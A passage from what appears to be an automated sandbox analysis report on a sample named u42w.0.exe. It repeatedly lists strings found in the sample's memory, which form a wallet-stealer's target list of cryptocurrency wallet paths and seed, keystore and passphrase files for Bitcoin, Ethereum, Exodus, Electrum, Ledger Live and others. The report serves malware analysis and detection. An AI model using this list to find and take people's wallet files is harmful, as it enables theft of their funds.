Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: Jaxx Liberty
                                Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger 